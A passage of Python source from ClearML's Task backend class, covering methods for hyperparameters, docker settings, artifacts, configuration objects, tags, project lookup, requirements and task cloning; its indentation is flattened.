:param name: Parameter name in full, i.e. Section/name. For example, 'Args/batch_size'
:return: True if the parameter was deleted successfully
"""
if not Session.check_min_api_version('2.9'):
raise ValueError(
"Delete hyper-parameter is not supported by your clearml-server, "
"upgrade to the latest version")
with self._edit_lock:
paramkey = tasks.ParamKey(section=name.split('/', 1)[0], name=name.split('/', 1)[1])
res = self.send(tasks.DeleteHyperParamsRequest(
task=self.id, hyperparams=[paramkey]), raise_on_errors=False)
self.reload()
return res.ok()
def update_parameters(self, *args, **kwargs):
# type: (*dict, **Any) -> ()
"""
Update the parameters for a Task. This method updates a complete group of key-value parameter pairs, but does
not support parameter descriptions (the input is a dictionary of key-value pairs).
Notice the parameter dict is flat:
i.e. {'Args/param': 'value'} will set the argument "param" in section "Args" to "value"
:param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are
merged into a single key-value pair dictionary.
:param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``.
"""
self._set_parameters(*args, __update=True, **kwargs)
def set_model_label_enumeration(self, enumeration=None):
# type: (Mapping[str, int]) -> ()
"""
Set a dictionary of labels (text) to ids (integers) {str(label): integer(id)}
:param dict enumeration: For example: {str(label): integer(id)}
"""
enumeration = enumeration or {}
with self._edit_lock:
self.reload()
execution = self.data.execution
if enumeration is None:
return
if not (isinstance(enumeration, dict)
and all(isinstance(k, six.string_types) and isinstance(v, int) for k, v in enumeration.items())):
raise ValueError('Expected label to be a dict[str => int]')
execution.model_labels = enumeration
self._edit(execution=execution)
def _set_default_docker_image(self):
# type: () -> ()
if not DOCKER_IMAGE_ENV_VAR.exists() and not DOCKER_BASH_SETUP_ENV_VAR.exists():
return
self.set_base_docker(
docker_cmd=DOCKER_IMAGE_ENV_VAR.get(default=""),
docker_setup_bash_script=DOCKER_BASH_SETUP_ENV_VAR.get(default=""))
def set_base_docker(self, docker_cmd, docker_arguments=None, docker_setup_bash_script=None):
# type: (str, Optional[Union[str, Sequence[str]]], Optional[Union[str, Sequence[str]]]) -> ()
"""
Set the base docker image for this experiment
If provided, this value will be used by clearml-agent to execute this experiment
inside the provided docker image.
When running remotely the call is ignored
:param docker_cmd: docker container image (example: 'nvidia/cuda:11.1')
:param docker_arguments: docker execution parameters (example: '-e ENV=1')
:param docker_setup_bash_script: bash script to run at the
beginning of the docker before launching the Task itself. example: ['apt update', 'apt-get install -y gcc']
"""
image = docker_cmd.split(' ')[0] if docker_cmd else ''
if not docker_arguments and docker_cmd:
docker_arguments = docker_cmd.split(' ')[1:] if len(docker_cmd.split(' ')) > 1 else ''
arguments = (docker_arguments if isinstance(docker_arguments, str) else ' '.join(docker_arguments)) \
if docker_arguments else ''
if docker_setup_bash_script:
setup_shell_script = docker_setup_bash_script \
if isinstance(docker_setup_bash_script, str) else '\n'.join(docker_setup_bash_script)
else:
setup_shell_script = ''
with self._edit_lock:
self.reload()
if Session.check_min_api_version("2.13"):
self.data.container = dict(image=image, arguments=arguments, setup_shell_script=setup_shell_script)
self._edit(container=self.data.container)
else:
if setup_shell_script:
raise ValueError(
"Your ClearML-server does not support docker bash script feature, please upgrade.")
execution = self.data.execution
execution.docker_cmd = image + (' {}'.format(arguments) if arguments else '')
self._edit(execution=execution)
def get_base_docker(self):
# type: () -> str
"""Get the base Docker command (image) that is set for this experiment."""
if Session.check_min_api_version("2.13"):
# backwards compatibility
container = self._get_task_property(
"container", raise_on_error=False, log_on_error=False, default={})
return (container.get('image', '') +
(' {}'.format(container['arguments']) if container.get('arguments', '') else '')) or None
else:
return self._get_task_property("execution.docker_cmd", raise_on_error=False, log_on_error=False)
def set_artifacts(self, artifacts_list=None):
# type: (Sequence[tasks.Artifact]) -> Optional[List[tasks.Artifact]]
"""
List of artifacts (tasks.Artifact) to update the task
:param list artifacts_list: list of artifacts (type tasks.Artifact)
:return: List of current Task's Artifacts or None if error.
"""
if not Session.check_min_api_version('2.3'):
return None
if not (isinstance(artifacts_list, (list, tuple))
and all(isinstance(a, tasks.Artifact) for a in artifacts_list)):
raise ValueError('Expected artifacts as List[tasks.Artifact]')
with self._edit_lock:
self.reload()
execution = self.data.execution
keys = [a.key for a in artifacts_list]
execution.artifacts = [a for a in execution.artifacts or [] if a.key not in keys] + artifacts_list
self._edit(execution=execution)
return execution.artifacts or []
def _add_artifacts(self, artifacts_list):
# type: (Sequence[tasks.Artifact]) -> Optional[List[tasks.Artifact]]
"""
List of artifacts (tasks.Artifact) to add to the the task
If an artifact by the same name already exists it will overwrite the existing artifact.
:param list artifacts_list: list of artifacts (type tasks.Artifact)
:return: List of current Task's Artifacts
"""
if not Session.check_min_api_version('2.3'):
return None
if not (isinstance(artifacts_list, (list, tuple))
and all(isinstance(a, tasks.Artifact) for a in artifacts_list)):
raise ValueError('Expected artifacts as List[tasks.Artifact]')
with self._edit_lock:
if Session.check_min_api_version("2.13") and not self._offline_mode:
req = tasks.AddOrUpdateArtifactsRequest(task=self.task_id, artifacts=artifacts_list, force=True)
res = self.send(req, raise_on_errors=False)
if not res or not res.response or not res.response.updated:
return None
self.reload()
else:
self.reload()
execution = self.data.execution
keys = [a.key for a in artifacts_list]
execution.artifacts = [a for a in execution.artifacts or [] if a.key not in keys] + artifacts_list
self._edit(execution=execution)
return self.data.execution.artifacts or []
def _delete_artifacts(self, artifact_names):
# type: (Sequence[str]) -> bool
"""
Delete a list of artifacts, by artifact name, from the Task.
:param list artifact_names: list of artifact names
:return: True if successful
"""
if not Session.check_min_api_version('2.3'):
return False
if not isinstance(artifact_names, (list, tuple)):
raise ValueError('Expected artifact names as List[str]')
with self._edit_lock:
if Session.check_min_api_version("2.13") and not self._offline_mode:
req = tasks.DeleteArtifactsRequest(
task=self.task_id, artifacts=[{"key": n, "mode": "output"} for n in artifact_names], force=True)
res = self.send(req, raise_on_errors=False)
if not res or not res.response or not res.response.deleted:
return False
self.reload()
else:
self.reload()
execution = self.data.execution
execution.artifacts = [a for a in execution.artifacts or [] if a.key not in artifact_names]
self._edit(execution=execution)
return self.data.execution.artifacts or []
def _set_model_design(self, design=None):
# type: (str) -> ()
with self._edit_lock:
self.reload()
if Session.check_min_api_version('2.9'):
configuration = self._get_task_property(
"configuration", default={}, raise_on_error=False, log_on_error=False) or {}
configuration[self._default_configuration_section_name] = tasks.ConfigurationItem(
name=self._default_configuration_section_name, value=str(design))
self._edit(configuration=configuration)
else:
execution = self.data.execution
if design is not None:
# noinspection PyProtectedMember
execution.model_desc = Model._wrap_design(design)
self._edit(execution=execution)
def get_labels_enumeration(self):
# type: () -> Mapping[str, int]
"""
Get the label enumeration dictionary label enumeration dictionary of string (label) to integer (value) pairs.
:return: A dictionary containing the label enumeration.
"""
if not self.data or not self.data.execution:
return {}
return self.data.execution.model_labels
def get_model_design(self):
# type: () -> str
"""
Get the model configuration as blob of text.
:return: The model configuration as blob of text.
"""
if Session.check_min_api_version('2.9'):
design = self._get_task_property(
"configuration", default={}, raise_on_error=False, log_on_error=False) or {}
if design:
design = design.get(sorted(design.keys())[0]).value or ''
else:
design = self._get_task_property(
"execution.model_desc", default={}, raise_on_error=False, log_on_error=False)
# noinspection PyProtectedMember
return Model._unwrap_design(design)
def get_random_seed(self):
# type: () -> int
# fixed seed for the time being
return 1337
def set_random_seed(self, random_seed):
# type: (int) -> ()
# fixed seed for the time being
pass
def set_project(self, project_id=None, project_name=None):
# type: (Optional[str], Optional[str]) -> ()
# if running remotely and we are the main task, skip setting ourselves.
if self._is_remote_main_task():
return
if not project_id:
assert isinstance(project_name, six.string_types)
res = self.send(projects.GetAllRequest(name=exact_match_regex(project_name)), raise_on_errors=False)
if not res or not res.response or not res.response.projects or len(res.response.projects) != 1:
return False
project_id = res.response.projects[0].id
assert isinstance(project_id, six.string_types)
self._set_task_property("project", project_id)
self._edit(project=project_id)
def get_project_name(self):
# type: () -> Optional[str]
if self.project is None:
return self._project_name[1] if self._project_name and len(self._project_name) > 1 else None
if self._project_name and self._project_name[1] is not None and self._project_name[0] == self.project:
return self._project_name[1]
res = self.send(projects.GetByIdRequest(project=self.project), raise_on_errors=False)
if not res or not res.response or not res.response.project:
return None
self._project_name = (self.project, res.response.project.name)
return self._project_name[1]
def get_tags(self):
# type: () -> Sequence[str]
return self._get_task_property("tags")
def set_system_tags(self, tags):
# type: (Sequence[str]) -> ()
assert isinstance(tags, (list, tuple))
tags = list(set(tags))
if Session.check_min_api_version('2.3'):
self._set_task_property("system_tags", tags)
self._edit(system_tags=self.data.system_tags)
else:
self._set_task_property("tags", tags)
self._edit(tags=self.data.tags)
def get_system_tags(self):
# type: () -> Sequence[str]
return self._get_task_property("system_tags" if Session.check_min_api_version('2.3') else "tags")
def set_tags(self, tags):
# type: (Sequence[str]) -> ()
assert isinstance(tags, (list, tuple))
if not Session.check_min_api_version('2.3'):
# not supported
return
self._set_task_property("tags", tags)
self._edit(tags=self.data.tags)
def set_name(self, name):
# type: (str) -> ()
"""
Set the Task name.
:param name: The name of the Task.
:type name: str
"""
name = name or ''
self._set_task_property("name", str(name))
self._edit(name=self.data.name)
def set_parent(self, parent):
# type: (Optional[Union[str, Task]]) -> ()
"""
Set the parent task for the Task.
:param parent: The parent task id (or parent Task object) for the Task. Set None for no parent.
:type parent: str or Task
"""
if parent:
assert isinstance(parent, (str, Task))
if isinstance(parent, Task):
parent = parent.id
assert parent != self.id
self._set_task_property("parent", str(parent) if parent else None)
self._edit(parent=self.data.parent)
def set_comment(self, comment):
# type: (str) -> ()
"""
Set a comment / description for the Task.
:param comment: The comment / description for the Task.
:type comment: str
"""
comment = comment or ''
self._set_task_property("comment", str(comment))
self._edit(comment=str(comment))
def set_task_type(self, task_type):
# type: (Union[str, Task.TaskTypes]) -> ()
"""
Set the task_type for the Task.
:param task_type: The task_type of the Task (see optional values in TaskTypes).
:type task_type: str or TaskTypes
"""
if not isinstance(task_type, self.TaskTypes):
task_type = self.TaskTypes(task_type)
self._set_task_property("task_type", str(task_type))
self._edit(type=task_type)
def set_archived(self, archive):
# type: (bool) -> ()
"""
Archive the Task or remove it from the archived folder.
:param archive: If True archive the Task, If False make sure it is removed from the archived folder
"""
with self._edit_lock:
system_tags = list(set(self.get_system_tags()) | {self.archived_tag}) \
if archive else list(set(self.get_system_tags()) - {self.archived_tag})
self.set_system_tags(system_tags)
def get_archived(self):
# type: () -> bool
"""
Return the Archive state of the Task
:return: If True the Task is archived, otherwise it is not.
"""
return self.archived_tag in self.get_system_tags()
def set_initial_iteration(self, offset=0):
# type: (int) -> int
"""
Set the initial iteration offset. The default value is ``0``. This method is useful when continuing training
from previous checkpoints.
For example, to start on iteration 100000, including scalars and plots:
..code-block:: py
task.set_initial_iteration(100000)
Task.set_initial_iteration(100000)
:param int offset: Initial iteration (at starting point)
:return: A newly set initial offset.
"""
if not isinstance(offset, int):
raise ValueError("Initial iteration offset must be an integer")
self._initial_iteration_offset = offset
if self._metrics_manager:
self._metrics_manager.set_iteration_offset(self._initial_iteration_offset)
return self._initial_iteration_offset
def get_initial_iteration(self):
# type: () -> int
"""
Get the initial iteration offset. The default value is ``0``. This method is useful when continuing training
from previous checkpoints.
:return: The initial iteration offset.
"""
return self._initial_iteration_offset
def get_status(self):
# type: () -> str
"""
Return The task status without refreshing the entire Task object object (only the status property)
TaskStatusEnum: ["created", "in_progress", "stopped", "closed", "failed", "completed",
"queued", "published", "publishing", "unknown"]
:return: str: Task status as string (TaskStatusEnum)
"""
status = self._get_status()[0]
if self._data:
self._data.status = status
return str(status)
def get_output_log_web_page(self):
# type: () -> str
"""
Return the Task results & outputs web page address.
For example: https://demoapp.demo.clear.ml/projects/216431/experiments/60763e04/output/log
:return: http/s URL link.
"""
return '{}/projects/{}/experiments/{}/output/log'.format(
self._get_app_server(),
self.project if self.project is not None else '*',
self.id,
)
def get_reported_scalars(
self,
max_samples=0, # type: int
x_axis='iter' # type: str
):
# type: (...) -> Mapping[str, Mapping[str, Mapping[str, Sequence[float]]]]
"""
Return a nested dictionary for the scalar graphs,
where the first key is the graph title and the second is the series name.
Value is a dict with 'x': values and 'y': values
.. note::
This call is not cached, any call will retrieve all the scalar reports from the back-end.
If the Task has many scalars reported, it might take long for the call to return.
Example:
.. code-block:: py
{'title': {'series': {
'x': [0, 1 ,2],
'y': [10, 11 ,12],
}}}
:param int max_samples: Maximum samples per series to return. Default is 0 returning all scalars.
With sample limit, average scalar values inside sampling window.
:param str x_axis: scalar x_axis, possible values:
'iter': iteration (default), 'timestamp': seconds from start, 'iso_time': absolute time
:return: dict: Nested scalar graphs: dict[title(str), dict[series(str), dict[axis(str), list(float)]]]
"""
if x_axis not in ('iter', 'timestamp', 'iso_time'):
raise ValueError("Scalar x-axis supported values are: 'iter', 'timestamp', 'iso_time'")
# send request
res = self.send(
events.ScalarMetricsIterHistogramRequest(
task=self.id, key=x_axis, samples=max(1, max_samples) if max_samples else None),
raise_on_errors=False,
ignore_errors=True,
)
if not res:
return {}
response = res.wait()
if not response.ok() or not response.response_data:
return {}
return response.response_data
def get_reported_plots(
self,
max_iterations=None
):
# type: (...) -> List[dict]
"""
Return a list of all the plots reported for this Task,
Notice the plot data is plotly compatible.
.. note::
This call is not cached, any call will retrieve all the plot reports from the back-end.
If the Task has many plots reported, it might take long for the call to return.
Example:
.. code-block:: py
[{
'timestamp': 1636921296370,
'type': 'plot',
'task': '0ce5e89bbe484f428e43e767f1e2bb11',
'iter': 0,
'metric': 'Manual Reporting',
'variant': 'Just a plot',
'plot_str': '{"data": [{"type": "scatter", "mode": "markers", "name": null,
"x": [0.2620246750155817], "y": [0.2620246750155817]}]}',
'@timestamp': '2021-11-14T20:21:42.387Z',
'worker': 'machine-ml',
'plot_len': 6135,
},]
:param int max_iterations: Maximum number of historic plots (iterations from end) to return.
:return: list: List of dicts, each one represents a single plot
"""
# send request
res = self.send(
events.GetTaskPlotsRequest(task=self.id, iters=max_iterations or 1),
raise_on_errors=False,
ignore_errors=True,
)
if not res:
return []
response = res.wait()
if not response.ok() or not response.response_data:
return []
return response.response_data.get('plots', [])
def get_reported_console_output(self, number_of_reports=1):
# type: (int) -> Sequence[str]
"""
Return a list of console outputs reported by the Task. Retrieved outputs are the most updated console outputs.
:param int number_of_reports: The number of reports to return. The default value is ``1``, indicating the
last (most updated) console output
:return: A list of strings, each entry corresponds to one report.
"""
if Session.check_min_api_version('2.9'):
request = events.GetTaskLogRequest(
task=self.id,
order='asc',
navigate_earlier=True,
batch_size=number_of_reports)
else:
request = events.GetTaskLogRequest(
task=self.id,
order='asc',
from_='tail',
batch_size=number_of_reports)
res = self.send(request)
response = res.wait()
if not response.ok() or not response.response_data.get('events'):
return []
lines = [r.get('msg', '') for r in response.response_data['events']]
return lines
def get_configuration_object(self, name):
# type: (str) -> Optional[str]
"""
Get the Task's configuration object section as a blob of text
Use only for automation (externally), otherwise use `Task.connect_configuration`.
:param str name: Configuration section name
:return: The Task's configuration as a text blob (unconstrained text string)
return None if configuration name is not valid
"""
return self._get_configuration_text(name)
def get_configuration_object_as_dict(self, name):
# type: (str) -> Optional[Union[dict, list]]
"""
Get the Task's configuration object section as parsed dictionary
Parsing supports JSON and HOCON, otherwise parse manually with `get_configuration_object()`
Use only for automation (externally), otherwise use `Task.connect_configuration`.
:param str name: Configuration section name
:return: The Task's configuration as a parsed dict.
return None if configuration name is not valid
"""
return self._get_configuration_dict(name)
def get_configuration_objects(self):
# type: () -> Optional[Mapping[str, str]]
"""
Get the Task's configuration object section as a blob of text
Use only for automation (externally), otherwise use `Task.connect_configuration`.
:return: The Task's configurations as a
dict (config name as key) and text blob as value (unconstrained text string)
"""
if not Session.check_min_api_version('2.9'):
raise ValueError(
"Multiple configurations are not supported with the current 'clearml-server', "
"please upgrade to the latest version")
configuration = self.data.configuration or {}
return {k: v.value for k, v in configuration.items()}
def set_configuration_object(self, name, config_text=None, description=None, config_type=None, config_dict=None):
# type: (str, Optional[str], Optional[str], Optional[str], Optional[Union[dict, list]]) -> None
"""
Set the Task's configuration object as a blob of text or automatically encoded dictionary/list.
Use only for automation (externally), otherwise use `Task.connect_configuration`.
:param str name: Configuration section name
:param config_text: configuration as a blob of text (unconstrained text string)
usually the content of a configuration file of a sort
:param str description: Configuration section description
:param str config_type: Optional configuration format type
:param dict config_dict: configuration dictionary/list to be encoded using HOCON (json alike) into stored text
Notice you can either pass `config_text` or `config_dict`, not both
"""
return self._set_configuration(
name=name, description=description, config_type=config_type,
config_text=config_text, config_dict=config_dict)
@classmethod
def get_projects(cls):
# type: () -> (List['projects.Project'])
"""
Return a list of projects in the system, sorted by last updated time
:return: A list of all the projects in the system. Each entry is a `services.projects.Project` object.
"""
res = cls._send(
cls._get_default_session(),
projects.GetAllRequest(order_by=['last_update']), raise_on_errors=True)
if res and res.response and res.response.projects:
return [projects.Project(**p.to_dict()) for p in res.response.projects]
return []
@classmethod
def get_project_id(cls, project_name):
# type: (str) -> Optional[str]
"""
Return a project's unique ID (str).
If more than one project matched the project_name, return the last updated project
If no project matched the requested name, returns None
:return: Project unique ID (str), or None if no project was found.
"""
assert project_name
assert isinstance(project_name, str)
res = cls._send(
cls._get_default_session(),
projects.GetAllRequest(order_by=['last_update'], name=exact_match_regex(project_name)),
raise_on_errors=False)
if res and res.response and res.response.projects:
return [projects.Project(**p.to_dict()).id for p in res.response.projects][0]
return None
@staticmethod
def running_locally():
# type: () -> bool
"""
Is the task running locally (i.e., ``clearml-agent`` is not executing it)
:return: True, if the task is running locally. False, if the task is not running locally.
"""
return not running_remotely()
@classmethod
def add_requirements(cls, package_name, package_version=None):
# type: (str, Optional[str]) -> None
"""
Force the adding of a package to the requirements list. If ``package_version`` is None, use the
installed package version, if found.
Example: Task.add_requirements('tensorflow', '2.4.0')
Example: Task.add_requirements('tensorflow', '>=2.4')
Example: Task.add_requirements('tensorflow') -> use the installed tensorflow version
Example: Task.add_requirements('tensorflow', '') -> no version limit
:param str package_name: The package name to add to the "Installed Packages" section of the task.
:param package_version: The package version requirements. If ``None``, then use the installed version.
"""
if not running_remotely() and hasattr(cls, 'current_task') and cls.current_task():
get_logger('task').warning(
'Requirement ignored, Task.add_requirements() must be called before Task.init()')
cls._force_requirements[str(package_name)] = package_version
@classmethod
def ignore_requirements(cls, package_name):
# type: (str) -> None
"""
Ignore a specific package when auto generating the requirements list.
Example: Task.ignore_requirements('pywin32')
:param str package_name: The package name to remove/ignore from the "Installed Packages" section of the task.
"""
if not running_remotely() and hasattr(cls, 'current_task') and cls.current_task():
get_logger('task').warning(
'Requirement ignored, Task.ignore_requirements() must be called before Task.init()')
cls._ignore_requirements.add(str(package_name))
@classmethod
def force_requirements_env_freeze(cls, force=True, requirements_file=None):
# type: (bool, Optional[Union[str, Path]]) -> None
"""
Force using `pip freeze` / `conda list` to store the full requirements of the active environment
(instead of statically analyzing the running code and listing directly imported packages)
Notice: Must be called before `Task.init` !
:param force: Set force using `pip freeze` flag on/off
:param requirements_file: Optional pass requirements.txt file to use
(instead of `pip freeze` or automatic analysis)
"""
cls._force_use_pip_freeze = requirements_file if requirements_file else bool(force)
def _get_default_report_storage_uri(self):
# type: () -> str
if self._offline_mode:
return str(self.get_offline_mode_folder() / 'data')
if not self._files_server:
self._files_server = Session.get_files_server_host()
return self._files_server
def _get_status(self):
# type: () -> (Optional[str], Optional[str])
if self._offline_mode:
return tasks.TaskStatusEnum.created, 'offline'
# noinspection PyBroadException
try:
all_tasks = self.send(
tasks.GetAllRequest(id=[self.id], only_fields=['status', 'status_message']),
).response.tasks
return all_tasks[0].status, all_tasks[0].status_message
except Exception:
return None, None
def _get_last_update(self):
# type: () -> (Optional[datetime])
if self._offline_mode:
return None
# noinspection PyBroadException
try:
all_tasks = self.send(
tasks.GetAllRequest(id=[self.id], only_fields=['last_update']),
).response.tasks
return all_tasks[0].last_update
except Exception:
return None
def _reload_last_iteration(self):
# type: () -> ()
# noinspection PyBroadException
try:
all_tasks = self.send(
tasks.GetAllRequest(id=[self.id], only_fields=['last_iteration']),
).response.tasks
self.data.last_iteration = all_tasks[0].last_iteration
except Exception:
return None
def _set_runtime_properties(self, runtime_properties):
# type: (Mapping[str, str]) -> bool
if not Session.check_min_api_version('2.13') or not runtime_properties:
return False
with self._edit_lock:
self.reload()
current_runtime_properties = self.data.runtime or {}
current_runtime_properties.update(runtime_properties)
# noinspection PyProtectedMember
self._edit(runtime=current_runtime_properties)
return True
def _get_runtime_properties(self):
# type: () -> Mapping[str, str]
if not Session.check_min_api_version('2.13'):
return dict()
return dict(**self.data.runtime) if self.data.runtime else dict()
def _clear_task(self, system_tags=None, comment=None):
# type: (Optional[Sequence[str]], Optional[str]) -> ()
self._data.script = tasks.Script(
binary='', repository='', tag='', branch='', version_num='', entry_point='',
working_dir='', requirements={}, diff='',
)
if Session.check_min_api_version("2.13"):
self._data.models = tasks.TaskModels(input=[], output=[])
self._data.container = dict()
self._data.execution = tasks.Execution(
artifacts=[], dataviews=[], model='', model_desc={}, model_labels={}, parameters={}, docker_cmd='')
self._data.comment = str(comment)
self._storage_uri = None
self._data.output.destination = self._storage_uri
self._update_requirements('')
if Session.check_min_api_version('2.13'):
self._set_task_property("system_tags", system_tags)
self._edit(system_tags=self._data.system_tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest='',
hyperparams=dict(), configuration=dict(),
container=self._data.container, models=self._data.models)
elif Session.check_min_api_version('2.9'):
self._set_task_property("system_tags", system_tags)
self._edit(system_tags=self._data.system_tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest='',
hyperparams=dict(), configuration=dict())
elif Session.check_min_api_version('2.3'):
self._set_task_property("system_tags", system_tags)
self._edit(system_tags=self._data.system_tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest='')
else:
self._set_task_property("tags", system_tags)
self._edit(tags=self._data.tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest=None)
@classmethod
def _get_api_server(cls):
# type: () -> ()
return Session.get_api_server_host()
def _get_app_server(self):
# type: () -> str
if not self._app_server:
self._app_server = Session.get_app_server_host()
return self._app_server
def _is_remote_main_task(self):
# type: () -> bool
"""
:return: return True if running remotely and this Task is the registered main task
"""
return running_remotely() and get_remote_task_id() == self.id
def _edit(self, **kwargs):
# type: (**Any) -> Any
with self._edit_lock:
if self._offline_mode:
for k, v in kwargs.items():
setattr(self.data, k, v)
Path(self.get_offline_mode_folder()).mkdir(parents=True, exist_ok=True)
with open((self.get_offline_mode_folder() / self._offline_filename).as_posix(), 'wt') as f:
export_data = self.data.to_dict()
export_data['project_name'] = self.get_project_name()
export_data['offline_folder'] = self.get_offline_mode_folder().as_posix()
json.dump(export_data, f, ensure_ascii=True, sort_keys=True)
return None
# Since we ae using forced update, make sure he task status is valid
status = self._data.status if self._data and self._reload_skip_flag else self.data.status
if status not in (tasks.TaskStatusEnum.created, tasks.TaskStatusEnum.in_progress):
# the exception being name/comment that we can always change.
if kwargs and all(k in ('name', 'comment', 'tags', 'system_tags', 'runtime') for k in kwargs.keys()):
pass
else:
raise ValueError('Task object can only be updated if created or in_progress')
res = self.send(tasks.EditRequest(task=self.id, force=True, **kwargs), raise_on_errors=False)
return res
def _update_requirements(self, requirements):
# type: (Union[dict, str]) -> ()
if not isinstance(requirements, dict):
requirements = {'pip': requirements}
# make sure we have str as values:
for key in requirements.keys():
if requirements[key] and not isinstance(requirements[key], str):
requirements[key] = '\n'.join(requirements[key])
# protection, Old API might not support it
# noinspection PyBroadException
try:
with self._edit_lock:
self.reload()
self.data.script.requirements = requirements
if self._offline_mode:
self._edit(script=self.data.script)
else:
self.send(tasks.SetRequirementsRequest(task=self.id, requirements=requirements))
except Exception:
pass
def _update_script(self, script):
# type: (dict) -> ()
with self._edit_lock:
self.reload()
self.data.script = script
self._edit(script=script)
def _set_configuration(self, name, description=None, config_type=None, config_text=None, config_dict=None):
# type: (str, Optional[str], Optional[str], Optional[str], Optional[Union[Mapping, list]]) -> None
"""
Set Task configuration text/dict. Multiple configurations are supported.
:param str name: Configuration name.
:param str description: Configuration section description.
:param str config_type: Optional configuration format type (str).
:param config_text: model configuration (unconstrained text string). usually the content
of a configuration file. If `config_text` is not None, `config_dict` must not be provided.
:param config_dict: model configuration parameters dictionary.
If `config_dict` is not None, `config_text` must not be provided.
"""
# make sure we have wither dict or text
mutually_exclusive(config_dict=config_dict, config_text=config_text, _check_none=True)
if not Session.check_min_api_version('2.9'):
raise ValueError("Multiple configurations are not supported with the current 'clearml-server', "
"please upgrade to the latest version")
if description:
description = str(description)
# support empty string
a_config = config_dict_to_text(config_dict if config_text is None else config_text)
with self._edit_lock:
self.reload()
configuration = self.data.configuration or {}
configuration[name] = tasks.ConfigurationItem(
name=name, value=a_config, description=description or None, type=config_type or None)
self._edit(configuration=configuration)
def _get_configuration_text(self, name):
# type: (str) -> Optional[str]
"""
Get Task configuration section as text
:param str name: Configuration name.
:return: The Task configuration as text (unconstrained text string).
return None if configuration name is not valid.
"""
if not Session.check_min_api_version('2.9'):
raise ValueError("Multiple configurations are not supported with the current 'clearml-server', "
"please upgrade to the latest version")
configuration = self.data.configuration or {}
if not configuration.get(name):
return None
return configuration[name].value
def _get_configuration_dict(self, name):
# type: (str) -> Optional[dict]
"""
Get Task configuration section as dictionary
:param str name: Configuration name.
:return: The Task configuration as dictionary.
return None if configuration name is not valid.
"""
config_text = self._get_configuration_text(name)
if not config_text:
return None
return text_to_config_dict(config_text)
def get_offline_mode_folder(self):
# type: () -> (Optional[Path])
"""
Return the folder where all the task outputs and logs are stored in the offline session.
:return: Path object, local folder, later to be used with `report_offline_session()`
"""
if not self._offline_mode:
return None
return get_offline_dir(task_id=self.task_id)
@classmethod
def _clone_task(
cls,
cloned_task_id, # type: str
name=None, # type: Optional[str]
comment=None, # type: Optional[str]
execution_overrides=None, # type: Optional[dict]
tags=None, # type: Optional[Sequence[str]]
parent=None, # type: Optional[str]
project=None, # type: Optional[str]
log=None, # type: Optional[logging.Logger]
session=None, # type: Optional[Session]
):
# type: (...) -> str
"""
Clone a task
:param str cloned_task_id: Task ID for the task to be cloned
:param str name: New for the new task
:param str comment: Optional comment for the new task
:param dict execution_overrides: Task execution overrides. Applied over the cloned task's execution
section, useful for overriding values in the cloned task.
:param list tags: Optional updated model tags
:param str parent: Optional parent Task ID of the new task.
:param str project: Optional project ID of the new task.
If None, the new task will inherit the cloned task's project.
:param logging.Logger log: Log object used by the infrastructure.
:param Session session: Session object used for sending requests to the API
:return: The new task's ID.
"""
session = session if session else cls._get_default_session()
use_clone_api = Session.check_min_api_version('2.9')
if use_clone_api:
res = cls._send(
session=session, log=log,
req=tasks.CloneRequest(
task=cloned_task_id,
new_task_name=name,
new_task_tags=tags,
new_task_comment=comment,
new_task_parent=parent,
new_task_project=project,
execution_overrides=execution_overrides,
)
)
cloned_task_id = res.response.id
return cloned_task_id
res = cls._send(session=session, log=log, req=tasks.GetByIdRequest(task=cloned_task_id))
task = res.response.task
output_dest = None
if task.output:
output_dest = task.output.destination
execution = task.execution.to_dict() if task.execution else {}
execution = ConfigTree.merge_configs(ConfigFactory.from_dict(execution),
ConfigFactory.from_dict(execution_overrides or {}))
# clear all artifacts
execution['artifacts'] = [e for e in execution['artifacts'] if e.get('mode') == 'input']
if not hasattr(task, 'system_tags') and not tags and task.tags:
tags = [t for t in task.tags if t != cls._development_tag]
extra = {}
if hasattr(task, 'hyperparams'):
extra['hyperparams'] = task.hyperparams
if hasattr(task, 'configuration'):
extra['configuration'] = task.configuration
if getattr(task, 'system_tags', None):
extra['system_tags'] = [t for t in task.system_tags if t not in (cls._development_tag, cls.archived_tag)]
req = tasks.CreateRequest(
name=name or task.name,
type=task.type,
input=task.input if hasattr(task, 'input') else {'view': {}},
tags=tags,
comment=comment if comment is not None else task.comment,
parent=parent,
project=project if project else task.project,
output_dest=output_dest,
execution=execution.as_plain_ordered_dict(),
script=task.script,
**extra
)
res = cls._send(session=session, log=log, req=req)
cloned_task_id = res.response.id
if task.script and task.script.requirements:
cls._send(session=session, log=log, req=tasks.SetRequirementsRequest(
task=cloned_task_id, requirements=task.script.requirements))
return cloned_task_id
@classmethod
def get_all(cls, session=None, log=None, **kwargs):
# type: (Optional[Session], Optional[logging.Logger], **Any) -> Any
"""
List all the Tasks based on specific projection.
:param Session session: The session object used for sending requests to the API.
:param logging.Logger log: The Log object.
:param kwargs: Keyword args passed to the GetAllRequest
(see :class:`.backend_api.services.v2_5.tasks.GetAllRequest`)
For example:
.. code-block:: bash
status='completed', 'search_text'='specific_word', 'user'='user_id', 'project'='project_id'
:type kwargs: dict
:return: The API response.
"""
session = session if session else cls._get_default_session()
req = tasks.GetAllRequest(**kwargs)
res = cls._send(session=session, req=req, log=log)
return res
@classmethod
def get_by_name(cls, task_name):
# type: (str) -> Task
res = cls._send(cls._get_default_session(), tasks.GetAllRequest(name=exact_match_regex(task_name)))
task = get_single_result(entity='task', query=task_name, results=res.response.tasks)
return cls(task_id=task.id)
@classmethod
def _get_project_name(cls, project_id):
res = cls._send(cls._get_default_session(), projects.GetByIdRequest(project=project_id), raise_on_errors=False)
if not res or not res.response or not res.response.project:
return None
return res.response.project.name
def _get_all_events(
self, max_events=100, batch_size=500, order='asc', event_type=None, unique_selector=itemgetter("url")
):
# type: (int, int, str, str, Callable[[dict], Any]) -> Union[List[Any], Set[Any]]
"""
Get a list of all reported events.
Warning: Debug only. Do not use outside of testing.
:param max_events: The maximum events the function will return. Pass None
to return all the reported events.
:param batch_size: The maximum number of events retrieved by each internal call performed by this method.
:param order: Events order (by timestamp) - "asc" for ascending, "desc" for descending.
:param event_type: Event type. Pass None to get all event types.
:param unique_selector: If provided, used to select a value from each event, only a unique set of these
values will be returned by this method.
:return: A list of events from the task. If unique_selector was provided, a set of values selected from events
of the task.
"""
batch_size = max_events or batch_size
